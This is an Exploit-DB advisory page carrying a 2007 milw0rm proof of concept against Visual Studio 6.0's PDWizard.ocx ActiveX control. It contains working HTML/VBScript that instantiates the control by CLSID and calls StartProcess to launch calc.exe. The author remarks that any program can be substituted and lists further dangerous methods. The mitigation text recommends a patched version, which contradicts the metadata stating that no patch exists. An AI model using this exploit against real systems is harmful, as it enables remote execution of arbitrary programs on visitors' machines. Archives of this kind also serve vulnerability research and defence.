Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx

vendor:

Visual Studio 6.0 PDWizard

by:

shinnai

7.5

CVSS

HIGH

Remote Arbitrary Command Execution

CWE

Product Name: Visual Studio 6.0 PDWizard

Affected Version From: PDWizard.ocx <= 6.0.0.9782

Affected Version To: PDWizard.ocx <= 6.0.0.9782

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

2007

Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx <= 6.0.0.9782) Remote Arbitrary Command Execution

This exploit targets the PDWizard.ocx file in Microsoft Visual Studio 6.0. The ocx file contains dangerous methods, including 'StartProcess()' and 'SyncShell()'. By using the 'StartProcess()' method, an attacker can execute any program by providing the right argument. This PoC demonstrates the execution of calc.exe, but any program can be executed. This vulnerability has the potential for significant impact.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx).

Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">------------------------------------------------------------------------------------------------------
 <b>Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx <= 6.0.0.9782) Remote Arbitrary Command Execution</b>
 url: http://www.microsoft.com

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
 
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

 <b><font color='red'>greetz to: Wiz001 (be safe brotha... and see soon :D)</font></b>

 <b>Description:
 This ocx contains a lot of extreme dangerous methods. Theese two are very interesting, they are:
 "StartProcess()" and "SyncShell()"
 Using one of them, you'll be able to run every program you like, simply giving to the method the 
 right argument.
 In this PoC, I use the "StartProcess()" method to execute the calc.exe, but you can do everything
 you like.
 Anyway, I think you could imagine what impact could have this kind of vulnerability :D

 Other dangerous methods of this ocx are:
 "SaveAs()"
 "CABDefaultURL()"
 "CABFileName()"
 "CABRunFile()"</b>
------------------------------------------------------------------------------------------------------

<object classid='clsid:0DDF3C0B-E692-11D1-AB06-00AA00BDD685' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language = 'vbscript'>
 Sub tryMe()
  test.StartProcess "c:\windows\system32\calc.exe", "False" 'you can change with your favourite application ;)
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-09-11]